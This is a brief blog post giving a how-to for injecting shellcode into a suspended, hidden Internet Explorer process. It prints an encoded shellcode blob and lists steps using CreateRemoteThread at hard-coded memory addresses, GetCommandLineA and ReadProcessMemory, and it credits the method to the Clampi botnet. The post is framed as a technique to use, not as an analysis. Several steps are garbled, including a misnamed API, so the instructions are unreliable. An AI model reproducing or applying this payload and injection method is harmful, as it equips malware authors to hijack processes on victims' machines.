Using shellcode to inject CODE into the Internet Explorer

Create a Internet Explorer process
in “Suspended Mode” with no visible window
Inject shellcode with the commandline:

Code:

C:\\Program Files\\Internet Explorer\\iexplore.exe
\xFC\xEB\x1A^\x8B\xFEW\xAC<Zt\x0F,A\xC0\xE0\x04\x8A\xD8\xAC,A\x02\xC3\xAA\xEB\xECX\xC
3\xE8\xE1\xFF\xFF\xFFILOMOIAJAAAAAAJAJAJAJAJAJAJAJAJAFOAPDBLJAIAAAAAAILNAF
GIKMCCEAPAEEBIIAGEGMBOKAEOCPCMGAGAAFOILHNAEIDMHBFDDMAFGFHFAGKAEFAG
KPPLIFMJEIAHMPPNAILNIIFMAHFBALIDBADJBHMPPNADNLHAAAAAAHELJOLEODDMAFHFA
FAGIBPAAAPAAFDLIAFLJIAHMPPNAIFMAHEDALJAJAAAAAAIJAEAIIJFMAIAEOIBEAAAAAAIL
OMILHFAEILFOANPPHGAJLIHELJIAHMPPNAOLALIPEEAIAIILPIPMPDKEOLAKFDLIEHJLIAHMP
PNADDMAILOFMDZ\0

Use the CreateRemoteThread API to create a remote thread

at memory location 0x7C812F1D …

This is is where the kernel function GetCommandLineA

has been mapped into Internet Explorer’s memory …

Return a pointer with the GetCommandLineA to the "shell" string

to pass as a parameter to the current process …

Use Api CreateRemoteThread at memory address 0x004A23DC ….

Call ReadProcessMemory ….

Use MapViewofFileExe on the object …

Once again call CreateRemoteThread to execute the injected code !

This method is used by the Clampi Botnet

Thx to the Researches …

Browse to em to get more infos !

发表评论

电子邮件地址不会被公开。 必填项已用*标注